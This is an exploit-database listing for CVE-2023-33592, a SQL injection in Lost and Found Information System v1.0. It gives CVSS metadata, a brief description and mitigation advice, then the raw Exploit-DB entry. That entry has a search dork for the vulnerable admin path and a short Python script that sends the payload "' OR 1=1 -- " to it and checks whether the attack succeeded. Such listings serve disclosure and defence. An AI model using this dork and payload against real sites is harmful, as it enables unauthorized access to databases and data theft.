Lost and Found Information System v1.0 - SQL Injection

vendor:

Lost and Found Information System

by:

Amirhossein Bahramizadeh

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Lost and Found Information System

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2023-33592

CPE: a:lost_and_found_information_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2023

Lost and Found Information System v1.0 – SQL Injection

This exploit allows an attacker to perform SQL injection on the Lost and Found Information System v1.0. By injecting a malicious SQL query, the attacker can manipulate the database and potentially access unauthorized information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")